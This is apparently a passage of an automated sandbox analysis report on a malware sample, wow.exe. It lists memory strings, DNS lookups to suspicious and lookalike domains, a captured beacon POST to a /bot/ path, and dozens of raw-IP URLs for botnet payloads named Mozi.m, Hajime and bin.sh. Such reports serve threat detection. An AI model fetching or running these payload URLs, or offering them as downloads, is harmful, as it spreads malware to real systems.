                            Source: wow.exe, 00000009.00000003.2240526362.000001D428E12000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Content-Security-Policy: default-src 'self' https://fonts.gstatic.com:443 https://region1.google-analytics.com:443 data:; style-src 'self' 'unsafe-inline' https://www.gstatic.com:443 https://fonts.googleapis.com:443 https://hcaptcha.com https://*.hcaptcha.com; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://www.gstatic.com:443 https://www.google.com/recaptcha/ https://www.googletagmanager.com:443 https://hcaptcha.com https://*.hcaptcha.com; frame-src https://www.google.com/recaptcha/ https://hcaptcha.com https://*.hcaptcha.com; img-src 'self' data: https://syndication.twitter.com:443; object-src 'none'; equals www.twitter.com (Twitter)
                            Source: wow.exe, 00000009.00000003.3069071733.000001D428CBA000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.3074377918.000001D428CBA000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.2244345593.000001D428C5A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: default-src 'self' https://fonts.gstatic.com:443 https://region1.google-analytics.com:443 data:; style-src 'self' 'unsafe-inline' https://www.gstatic.com:443 https://fonts.googleapis.com:443 https://hcaptcha.com https://*.hcaptcha.com; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://www.gstatic.com:443 https://www.google.com/recaptcha/ https://www.googletagmanager.com:443 https://hcaptcha.com https://*.hcaptcha.com; frame-src https://www.google.com/recaptcha/ https://hcaptcha.com https://*.hcaptcha.com; img-src 'self' data: https://syndication.twitter.com:443; object-src 'none'; equals www.twitter.com (Twitter)
                            Source: wow.exe, 00000009.00000003.2244345593.000001D428C5A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: default-src 'self' https://fonts.gstatic.com:443 https://region1.google-analytics.com:443 data:; style-src 'self' 'unsafe-inline' https://www.gstatic.com:443 https://fonts.googleapis.com:443 https://hcaptcha.com https://*.hcaptcha.com; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://www.gstatic.com:443 https://www.google.com/recaptcha/ https://www.googletagmanager.com:443 https://hcaptcha.com https://*.hcaptcha.com; frame-src https://www.google.com/recaptcha/ https://hcaptcha.com https://*.hcaptcha.com; img-src 'self' data: https://syndication.twitter.com:443; object-src 'none';GdI equals www.twitter.com (Twitter)
                            Source: global trafficDNS traffic detected: DNS query: urlhaus.abuse.ch
                            Source: global trafficDNS traffic detected: DNS query: wavedownload.netlify.app
                            Source: global trafficDNS traffic detected: DNS query: support-microsofthelp.com
                            Source: global trafficDNS traffic detected: DNS query: files.catbox.moe
                            Source: global trafficDNS traffic detected: DNS query: dragonhack.shop
                            Source: global trafficDNS traffic detected: DNS query: staatsgewalt.jameschans.de
                            Source: global trafficDNS traffic detected: DNS query: maerchen-beat-frei.ch
                            Source: global trafficDNS traffic detected: DNS query: github.com
                            Source: global trafficDNS traffic detected: DNS query: raw.githubusercontent.com
                            Source: global trafficDNS traffic detected: DNS query: plunder.dedyn.io
                            Source: global trafficDNS traffic detected: DNS query: kio.giize.com
                            Source: global trafficDNS traffic detected: DNS query: mta0.kio.giize.com
                            Source: global trafficDNS traffic detected: DNS query: irp.cdn-website.com
                            Source: global trafficDNS traffic detected: DNS query: api.accueil-coinbase.com
                            Source: global trafficDNS traffic detected: DNS query: cfs9.blog.daum.net
                            Source: global trafficDNS traffic detected: DNS query: tengfeidn.com
                            Source: global trafficDNS traffic detected: DNS query: pastebin.com
                            Source: global trafficDNS traffic detected: DNS query: filedn.eu
                            Source: global trafficDNS traffic detected: DNS query: safe.ywxww.net
                            Source: global trafficDNS traffic detected: DNS query: pub-37d3986658af451c9d52bb9f482b3e2d.r2.dev
                            Source: unknownHTTP traffic detected: POST /bot/ HTTP/1.0User-Agent: Mozilla/4.0Host: 18.230.108.113Content-Type: application/x-www-form-urlencodedConnection: closeContent-Length: 26Data Raw: 39 67 73 41 41 41 43 56 6d 35 4c 4c 6b 5a 4f 43 6b 59 53 58 6c 41 3d 3d 0d 0a Data Ascii: 9gsAAACVm5LLkZOCkYSXlA==
                            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 27 Jan 2025 07:20:17 GMTServer: Apache/2.4.52 (Ubuntu)Content-Length: 275Content-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 35 32 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 31 34 37 2e 34 35 2e 34 34 2e 31 33 31 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.52 (Ubuntu) Server at 147.45.44.131 Port 80</address></body></html>
                            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 27 Jan 2025 07:20:17 GMTServer: Apache/2.4.52 (Ubuntu)Content-Length: 275Content-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 35 32 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 31 34 37 2e 34 35 2e 34 34 2e 31 33 31 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.52 (Ubuntu) Server at 147.45.44.131 Port 80</address></body></html>
                            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 27 Jan 2025 07:20:17 GMTServer: Apache/2.4.52 (Ubuntu)Content-Length: 275Content-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 35 32 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 31 34 37 2e 34 35 2e 34 34 2e 31 33 31 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.52 (Ubuntu) Server at 147.45.44.131 Port 80</address></body></html>
                            Source: wow.exe, 00000009.00000003.2241325382.000001D428DFA000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.2240526362.000001D428E04000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.2236543751.000001D428F87000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.3142622532.000001D429AEC000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.2240617591.000001D428F8D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://103.125.163.10:7080/.i
                            Source: wow.exe, 00000009.00000003.2241325382.000001D428DFA000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.2240526362.000001D428E04000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.2236543751.000001D428F87000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.3142622532.000001D429AEC000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.2240617591.000001D428F8D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://103.125.163.10:7080/Hajime
                            Source: wow.exe, 00000009.00000003.2241351788.000001D428F70000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.3142622532.000001D429AEC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://103.125.163.10:7080/Mozi.m
                            Source: wow.exe, 00000009.00000003.2241325382.000001D428DFA000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.2240526362.000001D428E04000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.2236543751.000001D428F87000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.3142622532.000001D429AEC000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.2240617591.000001D428F8D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://103.164.200.170:7080/.i
                            Source: wow.exe, 00000009.00000003.2241351788.000001D428F70000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.3142622532.000001D429AEC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://103.164.200.170:7080/Mozi.m
                            Source: wow.exe, 00000009.00000003.3143013387.000001D428F8C000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.2876557393.000001D428F24000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.3005835320.000001D428F7D000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.2236543751.000001D428F87000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.2241882672.000001D428F87000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.3142622532.000001D429AEC000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.3068566720.000001D428F32000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.2957712464.000001D428F29000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.3005982054.000001D428F2A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://103.173.173.98:58982/i
                            Source: wow.exe, 00000009.00000003.2244858590.000001D428E0E000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.2236543751.000001D428E65000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.3142622532.000001D429AEC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://103.187.146.29/egn/File3.mentah
                            Source: wow.exe, 00000009.00000003.2244858590.000001D428E0E000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.2236543751.000001D428E65000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.3142622532.000001D429AEC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://103.187.146.29/enjoyers/InjekSimple3.mentah
                            Source: wow.exe, 00000009.00000003.2244858590.000001D428E0E000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.2236543751.000001D428E65000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.3142622532.000001D429AEC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://103.187.146.29/fvc/Injek3.mentah
                            Source: wow.exe, 00000009.00000003.2244858590.000001D428E0E000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.2236543751.000001D428E65000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.3142622532.000001D429AEC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://103.187.146.29/koala/Injek3.mentah
                            Source: wow.exe, 00000009.00000003.2244858590.000001D428E0E000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.2236543751.000001D428E65000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.3142622532.000001D429AEC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://103.187.146.29/samarinda/Simple3.mentah
                            Source: wow.exe, 00000009.00000003.2244858590.000001D428E0E000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.2236543751.000001D428E65000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.3142622532.000001D429AEC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://103.187.146.29/senju/Senju_Simple_VP.rar
                            Source: wow.exe, 00000009.00000003.2244858590.000001D428E0E000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.2236543751.000001D428E65000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.3142622532.000001D429AEC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://103.187.146.29/sumatra/File3.mentah
                            Source: wow.exe, 00000009.00000003.2244858590.000001D428E0E000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.2236543751.000001D428E65000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.3142622532.000001D429AEC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://103.187.146.29/tacvip/File3.mentah
                            Source: wow.exe, 00000009.00000003.2244858590.000001D428E0E000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.2236543751.000001D428E65000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.3142622532.000001D429AEC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://103.187.146.29/vvipejy/Simple3.mentah
                            Source: wow.exe, 00000009.00000003.2244858590.000001D428E0E000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.2236543751.000001D428E65000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.3142622532.000001D429AEC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://103.187.146.29/xcd/Simple3.mentah
                            Source: wow.exe, 00000009.00000003.2241351788.000001D428F70000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.3142622532.000001D429AEC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://103.217.215.238:17645/Mozi.m
                            Source: wow.exe, 00000009.00000003.2241325382.000001D428DFA000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.2240526362.000001D428E04000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.2236543751.000001D428F87000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.3142622532.000001D429AEC000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.2240617591.000001D428F8D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://103.230.153.181:2570/.i
                            Source: wow.exe, 00000009.00000003.2241351788.000001D428F70000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.3142622532.000001D429AEC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://103.230.153.181:2570/Mozi.m
                            Source: wow.exe, 00000009.00000003.2241351788.000001D428F70000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.3142622532.000001D429AEC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://103.69.88.70:21502/Mozi.m
                            Source: wow.exe, 00000009.00000003.2241351788.000001D428F70000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.3142622532.000001D429AEC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://103.70.204.249:30005/Mozi.m
                            Source: wow.exe, 00000009.00000003.2241351788.000001D428F70000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.3142622532.000001D429AEC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://103.90.207.13:25925/Mozi.m
                            Source: wow.exe, 00000009.00000003.2241351788.000001D428F70000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.3142622532.000001D429AEC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://105.112.93.194:63916/Mozi.m
                            Source: wow.exe, 00000009.00000003.2241325382.000001D428DFA000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.2240526362.000001D428E04000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.2236543751.000001D428F87000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.3142622532.000001D429AEC000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.2240617591.000001D428F8D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://106.246.224.219/.l/pty3
                            Source: wow.exe, 00000009.00000003.2241325382.000001D428DFA000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.2240526362.000001D428E04000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.2236543751.000001D428F87000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.3142622532.000001D429AEC000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.2240617591.000001D428F8D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://106.246.224.219/.l/pty3?ddos
                            Source: wow.exe, 00000009.00000003.2241325382.000001D428DFA000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.2240526362.000001D428E04000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.2236543751.000001D428F87000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.3142622532.000001D429AEC000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.2240617591.000001D428F8D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://106.246.224.219/.l/pty4
                            Source: wow.exe, 00000009.00000003.2241351788.000001D428F70000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.3142622532.000001D429AEC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://109.107.78.7:52900/Mozi.m
                            Source: wow.exe, 00000009.00000003.2241351788.000001D428F70000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.3142622532.000001D429AEC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://109.245.220.229:44758/Mozi.m
                            Source: wow.exe, 00000009.00000003.2241351788.000001D428F70000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.3142622532.000001D429AEC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://109.87.223.241:39478/Mozi.m
                            Source: wow.exe, 00000009.00000003.2241351788.000001D428F70000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.3142622532.000001D429AEC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://109.92.143.90:65469/Mozi.m
                            Source: wow.exe, 00000009.00000003.2241351788.000001D428F70000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.3142622532.000001D429AEC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://110.172.170.111:42963/Mozi.m
                            Source: wow.exe, 00000009.00000003.2244858590.000001D428E0E000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.2240526362.000001D428E12000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.3142622532.000001D429AEC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://110.180.141.186:38865/bin.sh
                            Source: wow.exe, 00000009.00000003.2241351788.000001D428F70000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.3142622532.000001D429AEC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://110.34.7.5:48764/Mozi.m
                            Source: wow.exe, 00000009.00000003.2241351788.000001D428F70000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.3142622532.000001D429AEC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://110.74.207.194:3585/Mozi.m
                            Source: wow.exe, 00000009.00000003.2244858590.000001D428E0E000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.2240526362.000001D428E12000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.3142622532.000001D429AEC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://112.230.74.17:13559/bin.sh
                            Source: wow.exe, 00000009.00000003.2244858590.000001D428E0E000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.2240526362.000001D428E12000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.3142622532.000001D429AEC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://112.252.170.105:36292/bin.sh
                            Source: wow.exe, 00000009.00000003.2244858590.000001D428E0E000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.2240526362.000001D428E12000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.3142622532.000001D429AEC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://112.252.170.105:36292/i
                            Source: wow.exe, 00000009.00000003.2241351788.000001D428F70000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.3142622532.000001D429AEC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://113.214.56.232:15053/Mozi.m
                            Source: wow.exe, 00000009.00000003.2241351788.000001D428F70000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.3142622532.000001D429AEC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://114.7.160.114:47530/Mozi.m
                            Source: wow.exe, 00000009.00000003.2241351788.000001D428F70000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.3142622532.000001D429AEC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://114.7.209.193:47530/Mozi.m
                            Source: wow.exe, 00000009.00000003.2244858590.000001D428E0E000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.2240526362.000001D428E12000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.3142622532.000001D429AEC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://115.48.1.196:36463/bin.sh
                            Source: wow.exe, 00000009.00000003.2244858590.000001D428E0E000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.2240526362.000001D428E12000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.3142622532.000001D429AEC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://115.48.1.196:36463/i
                            Source: wow.exe, 00000009.00000003.2241351788.000001D428F70000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.3142622532.000001D429AEC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://117.120.28.114:31060/Mozi.m
                            Source: wow.exe, 00000009.00000003.2241351788.000001D428F70000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.3142622532.000001D429AEC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://118.127.105.182:17818/Mozi.m
                            Source: wow.exe, 00000009.00000003.2241351788.000001D428F70000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.3142622532.000001D429AEC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://118.127.112.49:17818/Mozi.m
                            Source: wow.exe, 00000009.00000003.2241351788.000001D428F70000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.3142622532.000001D429AEC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://118.179.121.235:1123/Mozi.m
                            Source: wow.exe, 00000009.00000003.2241351788.000001D428F70000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.3142622532.000001D429AEC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://119.15.85.142:62506/Mozi.m
                            Source: wow.exe, 00000009.00000003.2244858590.000001D428E0E000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.2240526362.000001D428E12000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.3142622532.000001D429AEC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://119.184.224.198:47469/bin.sh
                            Source: wow.exe, 00000009.00000003.2244858590.000001D428E0E000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.2240526362.000001D428E12000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.3142622532.000001D429AEC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://119.184.224.198:47469/i
                            Source: wow.exe, 00000009.00000003.2241351788.000001D428F70000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.3142622532.000001D429AEC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://121.101.130.152:49784/Mozi.m
                            Source: wow.exe, 00000009.00000003.2241351788.000001D428F70000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.3142622532.000001D429AEC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://121.200.63.165:27123/Mozi.m
                            Source: wow.exe, 00000009.00000003.2241351788.000001D428F70000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.3142622532.000001D429AEC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://123.193.21.48:36061/Mozi.m
                            Source: wow.exe, 00000009.00000003.2241351788.000001D428F70000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.3142622532.000001D429AEC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://124.153.20.102:59977/Mozi.m
                            Source: wow.exe, 00000009.00000003.2241351788.000001D428F70000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.3142622532.000001D429AEC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://124.41.225.49:61677/Mozi.m
                            Source: wow.exe, 00000009.00000003.2241351788.000001D428F70000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.3142622532.000001D429AEC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://134.249.141.119:22752/Mozi.m
                            Source: wow.exe, 00000009.00000003.2241351788.000001D428F70000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.3142622532.000001D429AEC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://138.122.43.76:56486/Mozi.m
                            Source: wow.exe, 00000009.00000003.2241351788.000001D428F70000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.3142622532.000001D429AEC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://14.224.162.164:39109/Mozi.m
                            Source: wow.exe, 00000009.00000003.2244858590.000001D428E0E000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.2240526362.000001D428E12000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.3142622532.000001D429AEC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://14.228.145.230:44521/bin.sh
                            Source: wow.exe, 00000009.00000003.2241351788.000001D428F70000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.3142622532.000001D429AEC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://146.196.120.194:45995/Mozi.m
